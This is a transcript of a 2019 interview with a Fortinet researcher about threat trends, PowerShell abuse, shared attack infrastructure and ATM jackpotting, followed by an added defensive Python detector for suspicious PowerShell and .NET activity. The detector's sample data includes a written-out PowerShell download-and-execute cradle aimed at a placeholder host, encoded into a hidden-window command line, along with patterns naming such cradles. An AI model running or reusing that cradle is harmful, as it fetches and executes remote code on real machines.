
Tony Giandomenico, Fortinet | CUBEConversation May 2019


 

Peter Burris: From our studios in the heart of Silicon Valley, Palo Alto, California, this is a CUBE Conversation. Welcome to theCUBE studios for another CUBE Conversation, where we go in depth with thought leaders driving business outcomes with technology. I'm your host, Peter Burris. Every enterprise that is trying to do digital transformation finds themselves facing two challenges: one, their digital assets themselves are a source of value, and two, other assets that are sources of value are becoming increasingly digitized. That creates a lot of challenges, a lot of security concerns that bad agents out on the internet are exploiting, and it requires a programmatic, fundamental response to try to ensure that the digital assets or digitized assets aren't mucked with by bad guys. So to have that conversation we're here with Tony Giandomenico. Tony's a senior security strategist and researcher and the CTI lead at Fortinet. Tony, welcome back to theCUBE.

Tony Giandomenico: Hey Pete, it's great to be here, man. Good to see you.

Peter Burris: Yeah, well, we've been doing this for a couple of years now, Tony, and so let's just kick it off. What's new?

Tony Giandomenico: So what's new? Should we start talking a little bit about the index here, what we saw with the overall threat landscape?

Peter Burris: Sure.

Tony Giandomenico: Well, cool. So, like we always do, we always like to start off with an overall threat landscape, at least to give an overview of what that index looks like. It really consists of malware, botnets, application exploits. And what we looked at over the quarter, there was a lot of volatility throughout the quarter, but at the end of the day it ended up only 1% higher than the quarter before. Now some of that volatility really is being driven by what we've talked about a lot of times, Peter, in a lot of these other episodes: that swarm-like activity. Whenever an actual vulnerability is successfully exploited by an adversary, everybody swarms in on that vulnerability, and at our FortiGuard Labs you see that really super spike up. A great example of that would be in the last year, in December: ThinkPHP, which is an application that's a framework to rapidly develop web apps. They had a vulnerability that, if you successfully exploited it, it would give you remote, the remote access, or, I'm sorry, remote code execution. They were exploiting that, and we definitely saw a huge uptick. Now that wasn't the only one for the quarter, but that, along with some of the other ones, is really what's kind of driving the volume.

Peter Burris: So the index has been around for a few quarters now, and it's a phenomenal way for folks out there to observe how overall trends are evolving. But as you said, one of the key things that's being discovered, or that you're discovering as you do this research, is this notion of swarming. It seems as though there ought to be a couple of reasons why that's the case, Tony. We've talked about this in the past: there's folks who want to get a little bit more creative in creating bad stuff, and there's other folks who just want to keep the cost low and just leverage what's out there. Which approach do the bad guys tend to use more? And, or, is one approach more targeted to one or another kind of attack?

Tony Giandomenico: Well, it's funny. You usually see the folks in the cybercrime ecosystem that are really focusing on, you know, identifying them, not so much where they're doing more sort of targeted attacks; it's more of a pray-and-spray type of thing. And you see a lot of that. Anytime they can hire, you can get a life of cybercrime, right, and leverage some of these common services; you have code reuse, which is out there. So you have that sort of group there, right? And then you have more of the hands-on-keyboard, the more targeted attacks that are really focused on specific victims. So you have those two groups, I'd say. Now with that, though, there kind of is a commonality there, where there's this concept, and it's nothing new, we've been talking about this for years in the cybersecurity industry: it's living off the land, right? Where once a victim is on the actual machine itself, they start leveraging some of the tools that are already available there, and usually these tools, they're administration tools to be able to administer the actual network. But these tools can also be used in nefarious ways. An example here would be PowerShell. A lot of admins use PowerShell for efficiencies on the network, but that also can be used in nefarious ways, and the bad guys are using that. And then this past quarter we did see a lot of PowerShell activity. Now, Peter, having said that though, I think as a whole with the security community we're getting better at being able to identify these types of PowerShell attacks. One, we got better technology on the endpoint, and I think two, Microsoft is doing a better job of being able to provide us more hardening capabilities for PowerShell, like being able to restrict access to PowerShell, as well as giving us better logging capability to be able to identify that malicious activity. So we are getting better, and the bad guys know this. So I think what we can probably look for in the future is them leveraging either a different interface or a different language, because all they really need to do is interface with that .NET framework, which is part of a Windows system, and they can start doing the same exact things they were doing with PowerShell. And we're seeing that in the open-source community now: things like Silent Trinity, an open-source tool that allows you to do those same things. So if we see it in open source, it pretty much guarantees we're gonna see it out there in the wild here soon.

Peter Burris: So we've got a group of bad actors that are using this living-off-the-land approach to leverage technology that's out there, and we've still got kind of the big guys having to worry about being targeted, because that's how you make a lot of money if you're successful. But it certainly does sound, is that a general business practice for a lot of these guys, to leverage common infrastructure? And is this common infrastructure increasingly becoming better understood? Have I got that right?

Tony Giandomenico: No, you know, Peter, you're spot on here. What we did, we did some exploratory research in this last quarter, and what we found out is, with the exploits within that quarter, or the actual threats, sixty percent of those threats are using the same infrastructure. What I mean by infrastructure, I mean things like infrastructure to download malware, maybe to redirect you to some other site that then downloads malware. And that makes a lot of sense, Peter. You know why? Because in this cybercrime ecosystem, if you didn't realize this, it's a vicious, competitive market. Everybody is trying to sell their wares, and they want to make sure that their service is the best, it's better than someone else's, and they want to make sure that it's stable. So they find these community infrastructures that are tried and true; some of them are from bulletproof hosting services, things of that nature. So you see a lot of the folks in the cybercrime ecosystem using them. Now on the flip side, though, you definitely see some of the threat actors that are more sort of the advanced threat actors; maybe what they want to do is hide a little bit, so they'll hide in that larger community to possibly be able to bypass that attribution back to them, because they don't want to be sort of labeled with "oh hey, this particular threat actor always uses this infrastructure." So if they can blend in, it's a lot harder to find them.

Peter Burris: So they can use what is available, but at the same time differentiate themselves in this bad-actor ecosystem to take on even more challenging and potentially lucrative exploits. Now tell me, if we know something about this common infrastructure, as you said sixty percent of these attacks are using this common infrastructure, that suggests we can bring a common set of analysis frameworks to bear as we consider who these actors are and what their practices are. Have I got that right?

Tony Giandomenico: Yeah, yeah, absolutely. If you can align your playbook defenses with the offensive actual playbook that the threat actors are using, the better off you're gonna be, right? Because then you can combat them a lot better. And as a matter of fact, we've kind of introduced this sort of concept in conjunction with our partnership with the Cyber Threat Alliance. We're actually producing these threat actor playbooks, and the idea behind this is, if we can identify the malicious activity the threat actors are actually doing to complete their cyber mission, expose some of those tactics, those techniques, those procedures, we could possibly disrupt some of that malicious activity. And this past quarter here we focused on a group, Peter, called the Silence group, and they're really focused on identifying and stealing financial data. They're looking at banks, banking infrastructure, and ATM machines. And you'll get a kick out of this: with the ATM machines they're doing something called jackpotting, where if they can find the actual software behind the ATM machine, find that ATM process, they can inject a malicious DLL into that process, giving them total control over the ATM machine, and now they can dispense money at will, and they can have these money mules on the other side receive that actual money. So we have a lot of different campaigns and playbooks that we've identified on our website, and once we understand that, we align that with our Security Fabric and ensure that our customers are protected against that particular playbook.

Peter Burris: Tony, I'm not happy to hear that. So this is my distressed face that I use during these types of interviews. But if we're able to look at how bad-guy playbooks are operating, then we ought to be able to say, what are those fundamentals that a shop should be using, that security professionals should be using, that are just so basic and so consistent? And it seems that you guys have identified three: to do a better job of taking a fabric approach that starts to weave together all assets into a more common security framework; to do a better job of micro and macro segmentation, so that you can identify where problems are; and then finally, to increase your overall use of automation with AI and ML. How is this translating into your working with customers as they try to look at these playbooks and apply their own playbooks for how they set up their response regimes?

Tony Giandomenico: Yeah, so I think overall, I think you hit it on the head, Peter; you kind of nailed down some of those kind of fundamental sort of concepts here. Now you can identify and you can document as many playbooks as you want, but if you're not able to quickly respond when you identify those actual playbooks, that's really half the battle. I mean, you need to be able to identify, one, not only when the threat actor's in your environment, but then also you need to be able to quickly take action. And like you were saying with that fabric, if we can have that actual fabric being able to talk to the other controls within that fabric and take some action, the better off you're gonna be, because you can align your defenses there. And that's a great, you've got to make sure that all the controls within that fabric are all communicating together, they're working together, they're sharing information, and they're responding together.

Peter Burris: Sure enough. Yeah. Are you starting to advise customers, I'm curious, are you advising customers that even as they increase the capabilities of their fabric and how they handle their architectures from a micro and macro segmentation standpoint and increase their use of automation, are there things that they can do from a practice standpoint just to ensure that their responses are appropriate, fast and accurate?

Tony Giandomenico: Yeah, sure, sure. I think a lot of the actual fabric, once you actually build that fabric, there's certain playbook responses that you can program into that fabric. And I'll also even go, I know we talked about fundamentals, but I'll even dive a little bit lower here. You have that fabric, but you also have to make sure you understand all the assets you have in your environment, because that information and that knowledge helps you with that macro and micro segmentation. Because when you can isolate different areas, if there is a certain area that gets infected, you can quickly turn the knobs to isolate that particular threat in that specific segmented area, and that is really gonna allow you to fight through the attack, give you more time, and ultimately reduce the impact of that particular breach.

Peter Burris: So Tony, we got the summer months coming up. That means more vacations, which you'd guess means less activity, but then we got summer interns coming in, which may involve additional clicking on things that shouldn't be clicked on. Any ideas what security pros should be thinking about in the summer months? What do the trends show?

Tony Giandomenico: Well, I think we're gonna continue to see the same type of threats that we've seen in the first quarter, but I would say there may be a slight sort of drop-off, right? We got kids that are gonna be out on vacation, so schools may not see as much activity; you got folks gonna be taking vacations. And at the end of the day, most of these exploits are client-side exploits, which means a lot of times you need somebody to do something on the actual computer, either clicking that link or clicking the attachment, and if they're not there to do that, they'll just sit there and you'll see less activity over time. So we might see a little reduction in volume, but I still think we'll see very similar types of threats in the coming months.

Peter Burris: So a good time, a good opportunity for security pros to double down on putting in place new architecture practices and response regimes, so that when stuff kicks up in the fall they're that much more prepared. Tony Giandomenico, Fortinet, great once again. Thanks very much for being on theCUBE.

Tony Giandomenico: Hey, Peter, it's always a pleasure being here, man. Hope to see you again soon.

Peter Burris: You will. And once again, I'm Peter Burris. Until next time.
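The interview makes two detection points worth turning into code: PowerShell abuse is getting easier to catch because of better endpoint logging, and attackers are expected to respond by driving the .NET framework from some other host process (Silent Trinity being the open-source example). The following is an added example written for this page; it is not code from the interview, from Fortinet, or from the Silent Trinity project. It runs two checks over a handful of constructed, Sysmon-shaped endpoint events: it decodes a PowerShell -EncodedCommand argument and runs behaviour patterns over the plaintext, and it flags any process outside an allowlist that loads the .NET runtime (clr.dll, mscoree.dll), which is how .NET tooling that never touches powershell.exe shows up in image-load telemetry. The event field names, the sample events, the allowlist of expected CLR hosts and the suspicious-pattern set are all assumptions made for illustration.

```python
"""Living-off-the-land checks over constructed, Sysmon-shaped endpoint events.

Added example, not from the interview or any Fortinet material. The events are
made up and only loosely follow Sysmon Event 1 (process creation) and Event 7
(image load); the field names, allowlist and patterns are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")

# Behaviours worth flagging in a PowerShell command line, raw or after decoding.
SUSPICIOUS = {
    "download cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "dynamic execution": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "in-memory assembly load": re.compile(r"(?i)Reflection\.Assembly|\[Assembly\]::Load|FromBase64String"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}

# Processes expected to host the .NET CLR in this (assumed) environment. Any other
# image loading the runtime is how .NET tooling that bypasses powershell.exe shows up.
EXPECTED_CLR_HOSTS = {"powershell.exe", "powershell_ise.exe", "devenv.exe", "msbuild.exe", "w3wp.exe"}
CLR_IMAGES = {"clr.dll", "mscoree.dll", "coreclr.dll"}


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events: List[Dict]) -> List[Finding]:
    """Apply both checks to a list of events and return every finding in order."""
    findings: List[Finding] = []
    for ev in events:
        proc = basename(ev["image"])
        if ev["id"] == 1 and proc in ("powershell.exe", "pwsh.exe"):
            text = ev["cmdline"]
            decoded = decode_encoded_command(text)
            if decoded is not None:
                findings.append(Finding("encoded command", proc, decoded))
                text = f"{text} {decoded}"  # run the patterns over the plaintext as well
            for rule, pattern in SUSPICIOUS.items():
                hit = pattern.search(text)
                if hit:
                    findings.append(Finding(rule, proc, hit.group(0)))
        elif ev["id"] == 7 and basename(ev["image_loaded"]) in CLR_IMAGES:
            if proc not in EXPECTED_CLR_HOSTS:
                findings.append(Finding("unexpected CLR host", proc, basename(ev["image_loaded"])))
    return findings


# Constructed sample: an encoded download cradle, in the form an attacker would pass it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Routine admin use: should produce no findings.
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
    # Hidden window plus an encoded command hiding a download cradle.
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {PAYLOAD_B64}"},
    # PowerShell loading the CLR is normal.
    {"id": 7, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image_loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    # An unknown binary loading the CLR: the non-PowerShell .NET host the interview predicts.
    {"id": 7, "image": r"C:\Users\Public\updater.exe",
     "image_loaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.process}: {f.detail}")
```

The decode step matters because the raw command line carries none of the strings the patterns look for; without it the second event only trips the hidden-window rule. The CLR-host check is the caveat-laden one: many legitimate applications are managed code, so the allowlist has to be built from a baseline of your own fleet before it is allowed to page anyone, and an attacker who picks an allowlisted host to inject into will not appear here at all. Treat it as a hunting lead to pair with script block logging and module logging, not as a standalone alert.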

Published Date : May 17 2019

